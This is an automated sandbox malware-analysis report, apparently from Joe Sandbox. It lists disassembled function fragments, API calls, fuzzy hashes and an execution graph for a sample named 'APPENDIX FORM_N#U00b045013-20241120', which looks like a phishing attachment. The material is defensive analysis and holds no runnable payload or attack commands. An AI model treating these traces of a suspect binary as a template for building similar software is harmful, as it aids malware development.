                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??3@
                                                                                                              • String ID:
                                                                                                              • API String ID: 613200358-0
                                                                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InvalidateMessageRectSend
                                                                                                              • String ID: d=E
                                                                                                              • API String ID: 909852535-3703654223
                                                                                                              • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                              • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                              APIs
                                                                                                              • wcschr.MSVCRT ref: 0040F79E
                                                                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcschr$memcpywcslen
                                                                                                              • String ID: "
                                                                                                              • API String ID: 1983396471-123907689
                                                                                                              • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                              • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer_memicmpmemcpy
                                                                                                              • String ID: URL
                                                                                                              • API String ID: 2108176848-3574463123
                                                                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                              APIs
                                                                                                              • _snwprintf.MSVCRT ref: 0040A398
                                                                                                              • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _snwprintfmemcpy
                                                                                                              • String ID: %2.2X
                                                                                                              • API String ID: 2789212964-323797159
                                                                                                              • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                              • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _snwprintf
                                                                                                              • String ID: %%-%d.%ds
                                                                                                              • API String ID: 3988819677-2008345750
                                                                                                              • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                              • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                              APIs
                                                                                                              • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                              • memset.MSVCRT ref: 00401917
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PlacementWindowmemset
                                                                                                              • String ID: WinPos
                                                                                                              • API String ID: 4036792311-2823255486
                                                                                                              • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                              • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                              APIs
                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                                                                              • String ID: _lng.ini
                                                                                                              • API String ID: 383090722-1948609170
                                                                                                              • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                              • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                              • API String ID: 2773794195-880857682
                                                                                                              • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                              • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                              • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LongWindow
                                                                                                              • String ID: MZ@
                                                                                                              • API String ID: 1378638983-2978689999
                                                                                                              • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                              • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                              • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                              • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                              • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                              • memset.MSVCRT ref: 0042BAAE
                                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 438689982-0
                                                                                                              • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                              • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
APIs
  • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
• ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
• ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
• ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
• ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
• Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
• Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
• Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
• Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
APIs
• wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040A908
• free.MSVCRT ref: 0040A92B
• memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
• Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
• Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
• Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
• Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
APIs
• wcslen.MSVCRT ref: 0040B1DE
• free.MSVCRT ref: 0040B201
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B224
• memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
• Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
• Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
• Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
• Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
APIs
• memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
  • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
  • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
  • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
• memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
• memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
• memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID:
• API String ID: 231171946-0
• Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
• Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
• Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
• Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
APIs
• strlen.MSVCRT ref: 0040B0D8
• free.MSVCRT ref: 0040B0FB
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B12C
• memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: free$memcpy$mallocstrlen
• String ID:
• API String ID: 3669619086-0
• Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
• Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
• Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
• Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
• malloc.MSVCRT ref: 00417407
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
• free.MSVCRT ref: 00417425
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
• Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
• Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
• Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
• Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
APIs
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: wcslen$wcscat$wcscpy
• String ID:
• API String ID: 1961120804-0
• Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
• Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
• Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
• Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 20%
Signature Coverage: 0.5%
Total number of Nodes: 867
Total number of Limit Nodes: 21
33274->33275 33275->33272 33275->33274 33276->33275 33278 40d157 TranslateMessage DispatchMessageA 33276->33278 33277->33275 33277->33276 33278->33275 33280 404ac4 GetProcAddress 33279->33280 33281 404ae8 33279->33281 33282 404ad4 33280->33282 33283 404add FreeLibrary 33280->33283 33284 404b13 33281->33284 33285 404afc MessageBoxA 33281->33285 33282->33283 33283->33281 33284->33230 33285->33230 33287 410d17 LoadLibraryA 33286->33287 33288 410d3c 33286->33288 33287->33288 33289 410d2b GetProcAddress 33287->33289 33288->33232 33289->33288 33291 40cd08 ??2@YAPAXI 33290->33291 33293 40cd26 33291->33293 33294 40cd2d 33291->33294 33361 404025 6 API calls 33293->33361 33296 40cd66 33294->33296 33297 40cd59 DeleteObject 33294->33297 33354 407088 33296->33354 33297->33296 33299 40cd6b 33357 4019b5 33299->33357 33302 4019b5 strncat 33303 40cdbf _mbscpy 33302->33303 33303->33234 33363 407948 free free 33304->33363 33306 407cf7 33309 407a1f malloc memcpy free free 33306->33309 33310 407ddc 33306->33310 33312 407d7a free 33306->33312 33317 407e04 33306->33317 33367 40796e 7 API calls 33306->33367 33368 406f30 33306->33368 33309->33306 33310->33317 33376 407a1f 33310->33376 33312->33306 33364 407a55 33317->33364 33318 407e30 33319 407e57 33318->33319 33320 407e38 33318->33320 33319->33239 33319->33240 33320->33319 33321 407e41 _strcmpi 33320->33321 33321->33319 33321->33320 33382 4097ff 33322->33382 33324 409854 33387 409731 33324->33387 33328 4097ff 3 API calls 33327->33328 33329 409723 33328->33329 33407 40966c 33329->33407 33421 4023b2 33332->33421 33337 40ced3 33510 40cdda 7 API calls 33337->33510 33338 40cece 33342 40cf3f 33338->33342 33462 40c3d0 memset GetModuleFileNameA strrchr 33338->33462 33342->33264 33342->33265 33345 40ceed 